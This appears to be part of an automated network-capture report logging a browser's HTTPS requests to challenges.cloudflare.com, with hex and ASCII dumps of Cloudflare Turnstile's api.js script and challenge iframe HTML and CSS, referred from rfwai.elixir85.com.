                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:51 UTC408INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:51 GMT
                                                        Content-Type: application/javascript; charset=UTF-8
                                                        Content-Length: 42691
                                                        Connection: close
                                                        accept-ranges: bytes
                                                        last-modified: Thu, 27 Jun 2024 13:08:16 GMT
                                                        cache-control: max-age=31536000
                                                        access-control-allow-origin: *
                                                        cross-origin-resource-policy: cross-origin
                                                        Server: cloudflare
                                                        CF-RAY: 89d927b5bb29425e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:51 UTC961INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 45 74 28 65 2c 61 2c 72 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 62 3d 65 5b 75 5d 28 67 29 2c 5f 3d 62 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 6c 29 7b 72 28 6c 29 3b 72 65 74 75 72 6e 7d 62 2e 64 6f 6e 65 3f 61 28 5f 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 5f 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 61 2c 72 29 3b 66 75 6e 63 74
                                                        Data Ascii: "use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(l){r(l);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);funct
                                                        2024-07-03 19:06:51 UTC1369INData Raw: 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 61 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6f 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 61 3d 61 21 3d 6e 75 6c 6c 3f 61 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65
                                                        Data Ascii: tySymbols){var o=Object.getOwnPropertySymbols(e);a&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),r.push.apply(r,o)}return r}function Tt(e,a){return a=a!=null?a:{},Object.getOwnPropertyDescriptors?Object.definePropertie
                                                        2024-07-03 19:06:51 UTC1369INData Raw: 28 65 2c 61 29 7c 7c 52 74 28 65 2c 61 29 7c 7c 41 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 43 65 28 65 2c 61 29 7b 76 61 72 20 72 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30 5d 26 31 29 74 68 72 6f 77 20 75 5b 31 5d 3b 72 65 74 75 72 6e 20 75 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 6f 2c 63 2c 75 2c 67 3b 72 65 74 75 72 6e 20 67 3d 7b 6e
                                                        Data Ascii: (e,a)||Rt(e,a)||At()}function C(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ce(e,a){var r={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={n
                                                        2024-07-03 19:06:51 UTC1369INData Raw: 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 43 74 3d 33 30 30 30 32 30 3b 76 61 72 20 4e 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c 65 2e 4e 4f 4e 5f 49 4e 54 45 52 41 43 54 49 56 45 3d 22 6e 6f 6e 2d 69 6e 74 65 72 61 63 74 69 76 65 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45
                                                        Data Ascii: enges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ct=300020;var Ne=300030;var U;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE
                                                        2024-07-03 19:06:51 UTC1369INData Raw: 39 5f 2d 5d 7b 30 2c 33 32 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 4a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 76 72 2e 74 65 73 74 28 65 29 7d 76 61 72 20 6d 72 3d 2f 5e 5b 61 2d 7a 30 2d 39 5f 5c 2d 3d 5d 7b 30 2c 32 35 35 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 6d 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 6e 6f 72 6d 61 6c 22 2c 22 63 6f 6d 70 61 63 74 22 2c 22 69 6e 76 69 73 69 62 6c 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 29 7b
                                                        Data Ascii: 9_-]{0,32}$/i;function Je(e){return e===void 0?!0:typeof e=="string"&&vr.test(e)}var mr=/^[a-z0-9_\-=]{0,255}$/i;function Ze(e){return e===void 0?!0:typeof e=="string"&&mr.test(e)}function et(e){return N(["normal","compact","invisible"],e)}function tt(e){
                                                        2024-07-03 19:06:51 UTC1369INData Raw: 22 3b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 62 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 5f 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 32 2f 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 73 69 7a 65 29 2e 63 6f 6e 63 61 74 28 6c 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c
                                                        Data Ascii: ";return"".concat(b,"/cdn-cgi/challenge-platform/").concat(_,"turnstile/if/ov2/av0/rcv").concat(o,"/").concat(e,"/").concat(a,"/").concat(r.theme,"/").concat(r.size).concat(l)}function Le(e){if(e===void 0)throw new ReferenceError("this hasn't been initial
                                                        2024-07-03 19:06:51 UTC1369INData Raw: 65 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 47 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 61 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 61 2e 67 65 74 28 6f 29 3b 61 2e 73 65 74
                                                        Data Ascii: e){var a=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null||!Gt(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof a!="undefined"){if(a.has(o))return a.get(o);a.set
                                                        2024-07-03 19:06:51 UTC1369INData Raw: 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 4b 74 28 29 7b 76 61 72 20 65 3d 73 74 28 29 3b 65 7c 7c 70 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 61 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 61 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e
                                                        Data Ascii: c.src))return c}function Kt(){var e=st();e||p("Could not find Turnstile script tag, some features may not be available",43777);var a={loadedAsync:!1,params:new URLSearchParams};(e.async||e.defer)&&(a.loadedAsync=!0);var r=e.src,o=r.split("?");return o.len
                                                        2024-07-03 19:06:51 UTC1369INData Raw: 3f 53 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3f 68 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 34 38 30 70 78 22 3a 68 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 34 36 30 70 78 22 2c 68 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 68 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 32 30 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 31 70 78 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 43 6f 6c 6f 72 3d 22 23 30 30 30 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 53 74 79 6c 65 3d 22 73 6f 6c 69 64 22 2c 68 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75
                                                        Data Ascii: ?S:"nonexistent")?h.style.height="480px":h.style.height="460px",h.style.position="absolute",h.style.zIndex="21474836420",h.style.borderWidth="1px",h.style.borderColor="#000",h.style.borderStyle="solid",h.style.backgroundColor="#ffffff",h.style.borderRadiu
                                                        2024-07-03 19:06:51 UTC1369INData Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 22 6c 69 6e 65 22 29 3b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 2d 77 69 64 74 68 22 2c 22 33 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 22 2c 22 23 66 66 66 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 69 6c 6c 22 2c 22 6e 6f 6e 65 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 31 22 2c 22 36 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 32 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 31 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 32 22 2c
                                                        Data Ascii: ocument.createElementNS("http://www.w3.org/2000/svg","line");t.setAttribute("stroke-width","3"),t.setAttribute("stroke","#fff"),t.setAttribute("fill","none"),t.setAttribute("x1","6"),t.setAttribute("x2","18"),t.setAttribute("y1","18"),t.setAttribute("y2",


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.549756104.17.2.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:51 UTC791OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: iframe
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:52 UTC1362INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 79315
                                                        Connection: close
                                                        cross-origin-resource-policy: cross-origin
                                                        cross-origin-embedder-policy: require-corp
                                                        cross-origin-opener-policy: same-origin
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                        document-policy: js-profiling
                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                        origin-agent-cluster: ?1
                                                        referrer-policy: same-origin
                                                        2024-07-03 19:06:52 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 39 64 39 32 37 62 62 30 38 35 39 34 32 32 64 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                        Data Ascii: Server: cloudflareCF-RAY: 89d927bb0859422d-EWRalt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:52 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20
                                                        Data Ascii: 00%; height: 100%; overflow: hidden;}body { margin: 0; background-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont,
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c
                                                        Data Ascii: splay: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width: 6px; stroke: #f8f8f8; stroke-miterl
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 2c 20 2e 74 68 65 6d 65 2d 64 61 72
                                                        Data Ascii: ext a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .cb-lb .cb-i { border: 2px solid #dadada; background-color: #222;}.theme-dark .cb-lb input:focus ~ .cb-i, .theme-dar
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 0a 2e 74 68 65
                                                        Data Ascii: r: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .theme-dark #fr-helper-link:link,.the
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76
                                                        Data Ascii: #challenge-error-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-overlay a:link,#challenge-error-text a:v
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 62 61 63
                                                        Data Ascii: tion: underline;}.cb-lb input:focus ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:focus ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1); opacity: 1; border-radius: 5px; bac
